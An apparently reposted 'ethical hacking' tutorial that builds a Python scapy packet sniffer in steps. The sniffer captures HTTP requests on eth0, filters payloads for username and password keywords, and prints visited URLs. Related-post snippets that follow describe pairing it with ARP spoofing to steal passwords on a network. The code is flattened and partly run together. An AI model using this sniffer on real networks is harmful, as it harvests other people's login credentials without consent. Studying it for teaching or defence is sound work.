PACKET_SNIFFER

  • Capture data flowing through an interface.
  • Filter this data.
  • Display Interesting information such as:
    • Login info(username&password).
    • Visited websites.
    • Images.
    • ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

  • scapy has a sniffer function.
  • Can capture data sent to/from iface.
  • Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet.show()) sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet[scapy.all.Raw].load) sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
print(url) if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")

Python Ethical Hacking - Packet Sniffer(1)的更多相关文章

  1. Python Ethical Hacking - Packet Sniffer(2)

     Capturing passwords from any computer connected to the same network.  ARP_SPOOF + PACKET_SNIFFER Ta ...

  2. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  5. Python Ethical Hacking - BeEF Framework(1)

    Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

    Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  9. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

随机推荐

  1. cocos2dx 启用cjson

    在appDelegate.cpp文件中添加 #if __cplusplus extern "C" { // 加入此代码的目的,防止污染引擎的scripting目录 #include ...

  2. 一位老程序员说,有这份python3的开发指南,月薪能突破20K

    推荐视频: AI人工智能识别技术_第一节AI人工智能识别技术_第二节Python基础案例之教你如何查询对方IP_第一节Python基础案例之教你如何查询对方IP_第二节 有程序员说,这份python3 ...

  3. Elasticsearch、Solr、Lucene、Hermes区别

    Elasticsearch简介 Elasticsearch是一个实时分布式搜索和分析引擎.它让你以前所未有的速度处理大数据成为可能.它用于全文搜索.结构化搜索.分析以及将这三者混合使用:维基百科使用E ...

  4. Spring学习笔记下载

    动力节点的spring视频教程相当的经典:下载地址 https://pan.baidu.com/s/1eTSOaae

  5. 计算机网络之DNS常见攻击

    DNS欺骗 在Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同 ...

  6. python黑帽子之udp客户端

    将上文的TCP客户端简单修改便能得到UDP客户端 import socket target_host = "127.0.0.1" target_port = 80 client = ...

  7. 函数进化到Lambda表达式的三过程

    假如我们想要从一个整型数组中取出其中是奇数的选项,其实现方式有很多, 接下来通过三种方法的对比理解Lambda表达式的用途,需要了解的朋友可以参考下         //声明委托类型 public d ...

  8. IdentityServer4 4.x版本 配置Scope的正确姿势

    前言 IdentityServer4 是为ASP.NET Core系列量身打造的一款基于 OpenID Connect 和 OAuth 2.0 认证的框架 IdentityServer4官方文档:ht ...

  9. java语言进阶(七)_Lambda表达式

    1 函数式编程思想概述 在数学中,函数就是有输入量.输出量的一套计算方案,也就是"拿什么东西做什么事情".相对而言,面向对象过分强调"必须通过对象的形式来做事情" ...

  10. JS断点调试,必备的javaScript的debug调试技巧

    1.断点调试是啥?难不难? 断点调试其实并不是多么复杂的一件事,简单的理解无外呼就是打开浏览器,打开sources找到js文件,在行号上点一下罢了.操作起来似乎很简单,其实很多人纠结的是,是在哪里打断 ...